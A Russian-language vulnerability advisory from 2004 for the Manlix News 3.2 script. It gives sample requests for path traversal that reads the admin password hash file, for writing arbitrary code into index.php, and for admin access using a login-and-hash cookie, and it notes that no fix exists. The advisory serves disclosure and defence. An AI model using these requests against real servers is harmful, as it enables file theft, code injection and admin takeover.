Дата публикации: | 08.08.2004 |
Всего просмотров: | 2009 |
Опасность: | Критическая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Manlix News 3.2
Описание: Несколько уязвимостей в Mantix news позволяют удаленному пользователю просматривать произвольные файлы на сервере, изменять произвольные локальные файлы и получить административный доступ к приложению. 1. Просмотр произвольных файлов на сервере: http://127.0.0.1/index?news_section=../admins.inc.dat - получаем хеш пароля админа.2. Изменение локальных файлов (в системе администратирования): http://127.0.0.1/admin.php?section=0_0¤t_section=../../index.php - добавление в файл index.php произвольного кода 3. Возможность получения доступа к системе администратирования по хешу и логину. GET /admin.php?section=0_0¤t_section=[куда пишем]&day=01&month=01&year=2004&hour=03&minute=00&second=00&news=[что пишем]&add_news=ok HTTP/1.1 Host: [хост] Cookie: manlix_news_login=[логин]; manlix_news_password=[хеш пароля] Пример/Эксплоит: См. ниже URL производителя: http://www.manlix.ru Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | Exploit: |